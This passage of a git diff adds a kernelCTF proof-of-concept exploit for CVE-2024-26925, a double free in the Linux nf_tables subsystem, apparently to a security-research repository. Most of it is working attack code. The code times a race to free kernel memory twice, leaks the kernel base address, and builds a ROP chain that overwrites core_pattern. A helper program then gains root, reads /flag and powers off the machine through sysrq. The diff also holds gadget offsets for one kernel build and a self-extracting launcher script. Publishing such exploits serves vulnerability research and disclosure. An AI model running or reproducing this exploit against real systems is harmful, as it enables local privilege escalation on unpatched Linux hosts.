BATCH_BEGIN(batch, buf, sizeof(buf)); + DEL_TABLE(batch, nlh, tables[0]); + BATCH_END_SEND(batch, nl); + wait_gc(); + + info("build rop chain"); + + // fake object (also use as rop chain) + fake_obj[0] = kbase + add_rsp_0x50; + fake_obj[11] = kbase + pop_rdi; + fake_obj[12] = kbase + core_pattern; + fake_obj[13] = kbase + pop_3; + fake_obj[16] = fake_ops_addr; // obj->ops + + fake_obj[17] = kbase + pop_rsi; + fake_obj[18] = (size_t)&user_buf; + fake_obj[19] = kbase + 
pop_rdx;
+    fake_obj[20] = sizeof(user_buf);
+    fake_obj[21] = kbase + copy_from_user;
+    fake_obj[22] = kbase + rcu_read_unlock;
+    fake_obj[23] = kbase + pop_rdi;
+    fake_obj[24] = 0x1000000000000;
+    fake_obj[25] = kbase + delay_loop;
+    *(size_t *)((char *)fake_obj + 0x39) = kbase + pop_rsp_ret; // stack pivot (object ptr is pushed by ops->dump)
+
+    struct nftnl_table *table = new_table("pwn");
+    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, fake_obj, 256); // allocate to kmalloc-cg-256
+
+    // write object data back
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    NEW_TABLE(batch, nlh, table);
+    BATCH_END_SEND(batch, nl);
+
+    // invoke obj->ops->dump
+    info("invoke ops->dump");
+    nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETOBJ, NFPROTO_IPV4,
+                                NLM_F_ACK, seq++);
+    nftnl_obj_nlmsg_build_payload(nlh, obj);
+
+    if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
+        error("mnl_socket_send");
+    }
+}
+
+// Leak stage: creates table "leak_tbl" (256 bytes of userdata) and object
+// "leak_obj" in one batch, requests the table back with NFT_MSG_GETTABLE and
+// computes kbase from leaked_data[16]. It then deletes the object, the saved
+// set element and the table in a second batch and waits for GC.
+// NOTE(review): leaked_data is presumably filled in by recv_nft_reply() --
+// confirm against its definition. The local `ret` is never used.
+void leak_kbase(struct mnl_socket *nl, const char *tablename) {
+    char buf[MNL_SOCKET_BUFFER_SIZE];
+    struct mnl_nlmsg_batch *batch;
+    struct nftnl_table *table;
+    struct nftnl_obj *obj;
+    struct nftnl_set *set;
+    struct nftnl_set_elem *setelem;
+    struct nlmsghdr *nlh;
+    int ret;
+
+    memset(buffer, 0, 256);
+
+    table = new_table("leak_tbl");
+    // userdata allocate to kmalloc-cg-256, use to leak object data
+    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, buffer, 256);
+    obj = new_object(tablename, "leak_obj");
+    set = new_rhash_set(tablename, "pwn_set");
+    // pre-saved setelem
+    setelem = new_setelem_key(200, 0x41); // kmalloc-cg-256
+    nftnl_set_elem_add(set, setelem);
+
+    // [A, A] on the free list
+    info("reclaim double freed memory");
+
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    NEW_TABLE(batch, nlh, table);
+    NEW_OBJ(batch, nlh, obj);
+    BATCH_END_SEND(batch, nl);
+
+    nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETTABLE, NFPROTO_IPV4,
+                                NLM_F_ACK, seq); // do not update seq number here
+    nftnl_table_nlmsg_build_payload(nlh, table);
+
+    if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
+        error("mnl_socket_sendto");
+    }
+
+    recv_nft_reply(nl);
+
+    kbase = leaked_data[16] - nft_ct_expect_obj_ops;
+    info("kernel base: 0x%lx", kbase);
+
+    // reset double freed state
+    info("reset double free state");
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    DEL_OBJ(batch, nlh, obj);
+    // free saved elem to avoid double free
+    DEL_SETELEM(batch, nlh, set);
+    DEL_TABLE(batch, nlh, table);
+    BATCH_END_SEND(batch, nl);
+
+    // now freelist become [A, B, A]
+    wait_gc();
+}
+
+// Setup stage: builds table "conf_table" / chain "conf_chain" with
+// blocking_set_cnt blocking sets, times one batch that is meant to abort
+// (DELRULE plus deletion of a table named "nonexist") and derives the globals
+// setelem_timeout (0.75 x elapsed ms) and gc_interval (elapsed ms / 6).
+// NOTE(review): declared to return size_t but contains no return statement;
+// the call in main() ignores the result. `set`, `setelem`, `setelem_bk` and
+// `ret` are declared but never used here.
+size_t config_timing(struct mnl_socket *nl) {
+    char buf[MNL_SOCKET_BUFFER_SIZE * 0x10];
+    char tablename[] = "conf_table";
+    char chainname[] = "conf_chain";
+    struct timespec start, end;
+    struct nftnl_table *table;
+    struct nftnl_set *set;
+    struct nftnl_chain *chain;
+    struct nftnl_rule *rule;
+    struct nftnl_set_elem *setelem, *setelem_bk;
+    struct mnl_nlmsg_batch *batch;
+    struct nlmsghdr *nlh;
+    int ret;
+
+    table = new_table(tablename);
+    chain = new_chain(tablename, chainname);
+    // empty rule only used to build DELRULE
+    rule = new_rule(tablename, chainname);
+
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    NEW_TABLE(batch, nlh, table);
+    NEW_CHAIN(batch, nlh, chain);
+    BATCH_END_SEND(batch, nl);
+
+    progress("allocating blocking set");
+    for (int i = 0; i < blocking_set_cnt; ++i) {
+        char setname[0x30] = {};
+        snprintf(setname, sizeof(setname), "block%d", i);
+        setup_block(nl, tablename, chainname, setname);
+    }
+    done();
+
+    progress("approximate block time");
+    clock_gettime(CLOCK_MONOTONIC_RAW, &start);
+
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    // free all rules under chain
+    DEL_RULE(batch, nlh, rule);
+    // del non-exist table to force abort
+    DEL_TABLE(batch, nlh, new_table("nonexist"));
+    BATCH_END_SEND(batch, nl);
+
+    clock_gettime(CLOCK_MONOTONIC_RAW, &end);
+    done();
+
+    // the time elapsed after setelem was allocated
+    double block_time =
+        (end.tv_sec - start.tv_sec) * 1000 +
+        (end.tv_nsec - start.tv_nsec) / 1000000.0;
+
+    setelem_timeout = block_time / 2.0 * 1.5;
+    gc_interval = block_time / 6.0;
+
+    info("batch resolution took %.3lf ms", block_time);
+    info("setup race parameters:\n"
+         " setelem timeout: %u ms\n"
+         " gc interval: %u ms",
+         setelem_timeout, gc_interval);
+}
+
+// Trigger stage: creates the table, chain "pwn_chain" and rhash set "pwn_set",
+// adds the blocking sets, moves to CPU 1 and inserts the backup element. It
+// then sends a single batch holding module_load_cnt NEWOBJ requests (types
+// 100 and up), the element with a timeout, a DELRULE and a last NEWOBJ of
+// type 6666, and finally waits for GC.
+// NOTE(review): `start`/`end` are sampled but the interval is never read;
+// `ret` is unused.
+void trigger_vuln(struct mnl_socket *nl, const char *tablename) {
+    // need more buffer here
+    char buf[MNL_SOCKET_BUFFER_SIZE * 0x10];
+    struct timespec start, end;
+    struct nftnl_table *table;
+    struct nftnl_set *set;
+    struct nftnl_chain *chain;
+    struct nftnl_rule *rule;
+    struct nftnl_set_elem *setelem, *setelem_bk;
+    struct mnl_nlmsg_batch *batch;
+    struct nlmsghdr *nlh;
+    int ret;
+
+    info("setup initial state");
+
+    table = new_table(tablename);
+    set = new_rhash_set(tablename, "pwn_set");
+    chain = new_chain(tablename, "pwn_chain");
+    rule = new_rule(tablename, "pwn_chain");
+    setelem = new_setelem_timeout(200, setelem_timeout); // kmalloc-cg-256
+    setelem_bk = new_setelem_key(200, 0x41); // kmalloc-cg-256
+    nftnl_set_elem_add(set, setelem_bk);
+
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    NEW_TABLE(batch, nlh, table);
+    NEW_CHAIN(batch, nlh, chain);
+    NEW_SET(batch, nlh, set);
+    BATCH_END_SEND(batch, nl);
+
+    progress("allocating blocking set");
+    clock_gettime(CLOCK_MONOTONIC_RAW, &start);
+    for (int i = 0; i < blocking_set_cnt; ++i) {
+        char setname[0x30] = {};
+        snprintf(setname, sizeof(setname), "block%d", i);
+        setup_block(nl, tablename, "pwn_chain", setname);
+    }
+    clock_gettime(CLOCK_MONOTONIC_RAW, &end);
+    done();
+
+    // **Important**
+    // rhash gc will not be scheduled during high CPU usage (maybe caused by scheduler?)
+    // re-schedule main thread to a different CPU to avoid stopping gc thread from running
+    //
+    // Also a good news is since the freeing thread is using a different CPU,
+    // the double free check will be bypassed!
+    set_cpu(1);
+
+    // setup backup setelem after we switch to cpu1 to use the same cache
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+    NEW_SETELEM(batch, nlh, set);
+    BATCH_END_SEND(batch, nl);
+
+    nftnl_set_free(set);
+    set = new_rhash_set(tablename, "pwn_set");
+    nftnl_set_elem_add(set, setelem);
+
+    // race windows: (should be removed *after* gc put it into list)
+    // | N ticks | remove setelem | | (mutex unlock) |
+    // ....|---------------- __nf_tables_abort ------------------------|-- loop to load modules --| mutex relock
+    // |--- nft_rhash_gc -> queue trans_gc_work | nft_trans_gc_work -> nft_trans_gc_work_done -> call_rcu free setelem
+    // ^-- timer kicks in (grab mutex lock & check gc_seq & remove setelem)
+    progress("trigger double free");
+    BATCH_BEGIN(batch, buf, sizeof(buf));
+
+    // -EAGAIN will be instant handled, however it works a bit weird...
+    // instead of delete the resolved module request in `nft_net->module_list`
+    // `nf_tables_module_autoload()` it place it back, so the list will keep growing LOL
+    for (int i = 0; i < module_load_cnt; ++i) {
+        nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+                                    NFT_MSG_NEWOBJ, NFPROTO_IPV4,
+                                    NLM_F_CREATE | NLM_F_EXCL,
+                                    seq++);
+
+        // NFTNL_OBJ_TYPE cannot be directly set, manually build it here
+        nftnl_obj_nlmsg_build_simple_payload(nlh, tablename, "obj", i + 100);
+        mnl_nlmsg_batch_next(batch);
+    }
+
+    // setelem timer count from here
+    NEW_SETELEM(batch, nlh, set);
+
+    // to block target setelem from being removed during abort phase
+    // this will free all rules under pwn_chain
+    DEL_RULE(batch, nlh, rule);
+
+    // trigger abort autoload
+    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+                                NFT_MSG_NEWOBJ, NFPROTO_IPV4,
+                                NLM_F_CREATE | NLM_F_EXCL,
+                                seq++);
+    nftnl_obj_nlmsg_build_simple_payload(nlh, tablename, "obj", 6666);
+    mnl_nlmsg_batch_next(batch);
+
+    BATCH_END_SEND(batch, nl);
+    success();
+
+    wait_gc();
+}
+
+// Enters a new user namespace and network namespace. Exits through error()
+// when unshare() fails; otherwise always returns 0.
+int setup_sandbox(void) {
+    progress("setup user namespace");
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
+        error("unshare");
+    }
+    done();
+    return 0;
+}
+
+// Returns 1 when /proc/sys/kernel/core_pattern starts with
+// "|/proc/%P/fd/666", otherwise 0.
+// NOTE(review): the results of open() and read() are not checked; if either
+// fails, buf stays zero-filled and the function returns 0.
+int check_core() {
+    // Check if /proc/sys/kernel/core_pattern has been overwritten
+    char buf[0x100] = {};
+    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+    read(core, buf, sizeof(buf));
+    close(core);
+    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+// Copies the file "root" into an anonymous memfd, exposes it as fd 666, polls
+// check_core() once per second until it succeeds, then writes through a NULL
+// pointer on purpose.
+// NOTE(review): the descriptor returned by open("root", 0) is never closed.
+void crash() {
+    int memfd = memfd_create("", 0);
+    if (sendfile(memfd, open("root", 0), 0, 0xffffffff) == -1) {
+        error("sendfile");
+    }
+
+    dup2(memfd, 666);
+    close(memfd);
+    while (check_core() == 0)
+        sleep(1);
+
+    *(size_t *)0 = 0;
+}
+
+// Entry point: forks one idle child renamed "rabbit" and one child that runs
+// crash(), pins itself to CPU 0, enters the sandbox, creates 0x20 message
+// queues, opens and binds the netlink socket, sends 60 messages on each queue
+// and then runs the setup, trigger, leak and exploit stages in that order.
+// Reaching the final line means exploit_vuln() returned, which is reported as
+// a failure.
+int main(int argc, char *argv[]) {
+    struct mnl_socket *nl;
+    int msgq[0x20];
+
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+
+    if (fork() == 0) {
+        set_cpu(0);
+        strcpy(argv[0], "rabbit");
+        while (1)
+            sleep(1);
+    }
+
+    if (fork() == 0) {
+        set_cpu(0);
+        setsid();
+        crash();
+    }
+
+    // after rhash set allocation,
+    // main thread will eventually run on core 1
+    info("pin cpu @ core 0");
+    set_cpu(0);
+    setup_sandbox();
+
+    for (int i = 0; i < 0x20; ++i) {
+        msgq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
+        if (msgq[i] < 0) {
+            error("msgget");
+        }
+    }
+
+    nl = mnl_socket_open(NETLINK_NETFILTER);
+    if (!nl) {
+        error("mnl_socket_open");
+    }
+
+    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+        error("mnl_socket_bind");
+    }
+
+    // de-fragmentation
+    for (int i = 0; i < 0x20; i++) {
+        for (int j = 0; j < 60; j++) {
+            msg_alloc(msgq[i], buffer, 200);
+        }
+    }
+
+    info("====== setup stage ======");
+    config_timing(nl);
+
+    info("====== trigger stage ======");
+    trigger_vuln(nl, "exp");
+
+    info("====== leak stage ======");
+    leak_kbase(nl, "exp");
+
+    info("====== exploit stage ======");
+    exploit_vuln(nl, "exp");
+
+    error_s("exploit failed");
+}
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit
new file mode 100755
index 000000000..7b58f2cc7
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h new file mode 100644 index 000000000..9e44d54e3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h @@ -0,0 +1,16 @@ +#include +#include +size_t nft_ct_expect_obj_type = 0x2b6d0c0; +size_t nft_ct_expect_obj_ops = 0x1b2b740; +size_t core_pattern = 0x29bab60; +size_t rcu_read_unlock = 0x2122b0; +size_t copy_from_user = 0x8690d0; +size_t delay_loop = 0x11228a0; + +size_t pop_rdi = 0x12c7c0; +size_t pop_rsi = 0x2e2a6; +size_t pop_rdx = 0x848e2; +size_t pop_3 = 0x113164; // pop r12 ; pop rbp ; pop rbx ; ret +size_t pop_rsp_ret = 0xdb7e0; +size_t add_rsp_0x50 = 0x248c16; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret) +size_t push_rsi_jmp_deref_rsi_0x39 = 0x988647; // push rsi ; jmp qword ptr [rsi + 0x39] diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c new file mode 100644 index 000000000..d194a60e7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c @@ -0,0 +1,33 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +char buf[0x100]; +char path[0x100]; + +int main() { + FILE* fp = popen("pidof rabbit", "r"); + fread(buf, 1, 0x100, fp); + fclose(fp); + + int pid = strtoull(buf, 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + system("cat /flag; echo o>/proc/sysrq-trigger"); +} + diff --git 
a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh new file mode 100755 index 000000000..2da48048b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh @@ -0,0 +1,9 @@ +#!/bin/sh +mkdir /tmp/workdir # /tmp/exp is a dir +cd /tmp/workdir + +dd if=$0 of=exp.tar.gz skip=1 +tar -xf exp.tar.gz +./exp + +exit diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h new file mode 100644 index 000000000..2d65235ef --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h @@ -0,0 +1,213 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define error(msg) do { \ + perror("\33[2K\r[-] " msg); \ + exit(EXIT_FAILURE); \ +} while (0) + +#define error_s(msg) do { \ + printf("\33[2K\r[-] " msg); \ + exit(EXIT_FAILURE); \ +} while (0) + +#define info(msg, ...) \ + printf("[*] " msg "\n" __VA_OPT__(,) __VA_ARGS__) + +#define progress(msg, ...) 
\ + printf("[ ] " msg __VA_OPT__(,) __VA_ARGS__) + +#define done() printf("\0337\r[+]\0338: done\n") +#define success() printf("\0337\r[+]\338: success\n") + +uint32_t seq = 123456; + +#define BATCH_BEGIN(batch, buf, buf_sz) \ + do { \ + batch = mnl_nlmsg_batch_start(buf, buf_sz); \ + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define BATCH_END_SEND(batch, nl) \ + do { \ + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); \ + mnl_nlmsg_batch_next(batch); \ + int ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), \ + mnl_nlmsg_batch_size(batch)); \ + if (ret < 0) { \ + error("mnl_socket_sendto"); \ + } \ + mnl_nlmsg_batch_stop(batch); \ + } while (0) + +#define NEW_TABLE(batch, nlh, table) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWTABLE, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_table_nlmsg_build_payload(nlh, table); \ + mnl_nlmsg_batch_next(batch); \ + } while(0) + +#define DEL_TABLE(batch, nlh, table) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELTABLE, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_table_nlmsg_build_payload(nlh, table); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_CHAIN(batch, nlh, chain) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWCHAIN, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_chain_nlmsg_build_payload(nlh, chain); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_RULE(batch, nlh, rule) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWRULE, NFPROTO_IPV4, \ + NLM_F_CREATE, seq++); \ + nftnl_rule_nlmsg_build_payload(nlh, rule); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_RULE(batch, nlh, rule) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELRULE, NFPROTO_IPV4, \ + 0, seq++); 
\ + nftnl_rule_nlmsg_build_payload(nlh, rule); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_SET(batch, nlh, set) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWSET, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_set_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_SETELEM(batch, nlh, setelem) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWSETELEM, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_set_elems_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_SETELEM(batch, nlh, setelem) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELSETELEM, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_set_elems_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_OBJ(batch, nlh, obj) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWOBJ, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, \ + seq++); \ + nftnl_obj_nlmsg_build_payload(nlh, obj); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_OBJ(batch, nlh, obj) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELOBJ, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_obj_nlmsg_build_payload(nlh, obj); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +char msg_buf[0x2000]; +struct msg { + long mtype; + char mtext[]; +}; + +void msg_alloc(int msgqid, char *data, size_t size) { + struct msg *msg = (struct msg *)msg_buf; + msg->mtype = 1; + + size -= 0x30; + memcpy(msg->mtext, data, size); + + if (msgsnd(msgqid, msg, size, 0) < 0) { + error("msgsnd"); + } +} + +void msg_free(int msgqid) { + struct msg *msg = (struct msg *)msg_buf; + if (msgrcv(msgqid, msg, sizeof(msg_buf)-8, 0, IPC_NOWAIT) < 0) { + error("msgrcv"); + } +} + +void hexdump(const void* data, size_t size) { + 
char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } +} + +void set_cpu(int cpu_n) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(0, sizeof(set), &set) < 0) { + error("sched_setaffinity"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json new file mode 100644 index 000000000..ff302015d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp153", "exp156"], + "vulnerability": { + "cve": "CVE-2024-26925", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27", + "affected_versions": ["6.5 - 6.9-rc3"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "lts-6.1.81": { + "environment": "lts-6.1.81", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "95% success rate" + }, + "cos-105-17412.294.36": { + "environment": "cos-105-17412.294.36", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "90% success rate" + } + } +} diff --git 
a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz new file mode 100644 index 000000000..7c52e4874 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz new file mode 120000 index 000000000..207e9f3c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz @@ -0,0 +1 @@ +original_exp153.tar.gz \ No newline at end of file